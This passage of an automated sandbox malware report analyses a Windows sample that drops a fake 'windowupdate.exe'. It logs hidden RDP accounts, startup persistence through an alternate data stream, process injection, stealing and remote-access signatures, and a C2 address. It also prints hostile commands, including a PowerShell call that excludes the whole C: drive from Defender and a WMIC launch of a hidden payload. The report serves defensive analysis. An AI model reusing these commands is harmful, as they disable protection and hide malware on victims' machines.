CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
            Source: windowupdate.exe, 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: windowupdate.exe, 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:startJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe TID: 6100 Thread sleep count: 59 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5708 Thread sleep time: -11990383647911201s >= -30000s
            Source: C:\ProgramData\windowupdate.exe TID: 5060 Thread sleep count: 107 > 30
            Source: C:\ProgramData\windowupdate.exe TID: 5060 Thread sleep time: -85600s >= -30000s
            Source: C:\ProgramData\windowupdate.exe TID: 4884 Thread sleep count: 59 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3048 Thread sleep time: -14757395258967632s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1664 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\cmd.exe TID: 2756 Thread sleep count: 805 > 30
            Source: C:\Windows\SysWOW64\cmd.exe TID: 2756 Thread sleep time: -9660000s >= -30000s
            Source: C:\ProgramData\windowupdate.exe Last function: Thread delayed
            Source: C:\ProgramData\windowupdate.exe Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\cmd.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\cmd.exe Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5448
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1736
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5712
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1074
            Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 805
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe API coverage: 3.1 %
            Source: C:\ProgramData\windowupdate.exe API coverage: 4.6 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe Code function: 0_2_0096B663 VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect,0_2_0096B663
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe Code function: 0_2_009ADAE0 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,0_2_009ADAE0
            Source: C:\ProgramData\windowupdate.exe Code function: 3_2_00D9DAE0 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,3_2_00D9DAE0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\
            Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\
            Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
            Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\
            Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
            Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
            Source: powershell.exe, 00000001.00000003.375917316.0000000004C15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.416120857.0000000005033000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Jaik.73085.20962.exe, 00000000.00000000.255527605.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp, windowupdate.exe, 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp, windowupdate.exe, 00000003.00000000.281195530.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp Binary or memory string: .?AVCRegistryVirtualMachine@ATL@@,
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, windowupdate.exe.0.dr, ProgramData_ApplicationData.0.dr Binary or memory string: .?AVCRegistryVirtualMachine@ATL@@
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, windowupdate.exe.0.dr, ProgramData_ApplicationData.0.dr Binary or memory string: I.?AVCRegistryVirtualMachine@ATL@@,
            Source: powershell.exe, 00000001.00000003.375917316.0000000004C15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.416120857.0000000005033000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe Code function: 0_2_00992720 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00992720
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe Code function: 0_2_0096B663 VirtualProtect ?,-00000001,00000104,?,?,?,0000001C 0_2_0096B663
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe Code function: 0_2_009D20D0 VirtualQuery,GetProcAddress,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,0_2_009D20D0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe Code function: 0_2_00956AF9 mov esi, dword ptr fs:[00000030h] 0_2_00956AF9
            Source: C:\ProgramData\windowupdate.exe Code function: 3_2_00D46AF9 mov esi, dword ptr fs:[00000030h] 3_2_00D46AF9
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_032B001A mov eax, dword ptr fs:[00000030h] 14_2_032B001A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe Code function: 0_2_00958C70 SetUnhandledExceptionFilter,0_2_00958C70
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe Code function: 0_2_009575F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_009575F0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe Code function: 0_2_00992720 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00992720
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe Code function: 0_2_00958A40 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00958A40
            Source: C:\ProgramData\windowupdate.exe Code function: 3_2_00D48C70 SetUnhandledExceptionFilter,3_2_00D48C70
            Source: C:\ProgramData\windowupdate.exe Code function: 3_2_00D475F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00D475F0
            Source: C:\ProgramData\windowupdate.exe Code function: 3_2_00D82720 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00D82720
            Source: C:\ProgramData\windowupdate.exe Code function: 3_2_00D48A40 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00D48A40

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\ProgramData\windowupdate.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 32B0000
            Source: C:\ProgramData\windowupdate.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 3360000
            Source: C:\ProgramData\windowupdate.exe Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 32B0000 protect: page execute and read and write
            Source: C:\ProgramData\windowupdate.exe Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 3360000 protect: page read and write
            Source: C:\ProgramData\windowupdate.exe Thread created: C:\Windows\SysWOW64\cmd.exe EIP: 32B010E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
            Source: C:\ProgramData\windowupdate.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create '"C:\ProgramData:ApplicationData"'
            Source: windowupdate.exe, 00000003.00000002.527122655.0000000005220000.00000040.00001000.00020000.00000000.sdmp, windowupdate.exe, 00000003.00000002.526701012.0000000004E1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetProgmanWindow
            Source: windowupdate.exe, 00000003.00000002.527122655.0000000005220000.00000040.00001000.00020000.00000000.sdmp, windowupdate.exe, 00000003.00000002.526701012.0000000004E1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SetProgmanWindow
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\ProgramData\windowupdate.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe Code function: 0_2_00959370 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00959370

            Lowering of HIPS / PFW / Operating System Security Settings

            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10

            Stealing of Sensitive Information

            Source: Yara match File source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPE
            Source: Yara match File source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000003.271131507.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000003.271032927.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000003.271207797.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.525655922.00000000038E4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.310491730.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.298458664.0000000003474000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.310518053.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.310053824.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.310397605.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Variant.Jaik.73085.20962.exe PID: 5708, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: windowupdate.exe PID: 5732, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match File source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPE
            Source: Yara match File source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000003.271131507.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000003.271032927.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000003.271207797.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.525655922.00000000038E4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.310491730.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.298458664.0000000003474000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.310518053.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.310053824.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.310397605.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | 21 Windows Management Instrumentation | 2 Registry Run Keys / Startup Folder | 312 Process Injection | 11 Disable or Modify Tools | 111 Input Capture | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Endpoint Denial of Service
            Default Accounts | 11 Scripting | Boot or Logon Initialization Scripts | 2 Registry Run Keys / Startup Folder | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | 111 Input Capture | Exfiltration Over Bluetooth | 1 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 11 Scripting | Security Account Manager | 15 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 2 Obfuscated Files or Information | NTDS | 1 Query Registry | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap |  | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 11 Software Packing | LSA Secrets | 121 Security Software Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | 13 Masquerading | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | 21 Virtualization/Sandbox Evasion | DCSync | 21 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 312 Process Injection | Proc Filesystem | 1 Application Window Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
            Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Hidden Users | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction
            Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | 1 NTFS File Attributes | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols |  |  | Data Encrypted for Impact
            [Behavior graph, image not reproduced] Behavior Graph ID: 626897; Sample: SecuriteInfo.com.Variant.Ja...; Startdate: 15/05/2022; Architecture: WINDOWS; Score: 100
            Sample-level signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures
            Started at top level: SecuriteInfo.com.Variant.Jaik.73085.20962.exe; cmd.exe; WmiPrvSE.exe
            SecuriteInfo.com.Variant.Jaik.73085.20962.exe dropped: C:\ProgramData\windowupdate.exe, PE32; C:\ProgramData:ApplicationData, PE32; C:\Users\user\AppData\...\programs.bat:start, ASCII; 2 other malicious files
            SecuriteInfo.com.Variant.Jaik.73085.20962.exe signatures: Creates files in alternative data streams (ADS); Drops script or batch files to the startup folder; Adds a directory exclusion to Windows Defender; Increases the number of concurrent connection per server for Internet Explorer
            SecuriteInfo.com.Variant.Jaik.73085.20962.exe started: windowupdate.exe; powershell.exe (which started conhost.exe)
            windowupdate.exe DNS/IP: 104.128.191.44, 49694, 8080 EPBTELECOMUS Reserved
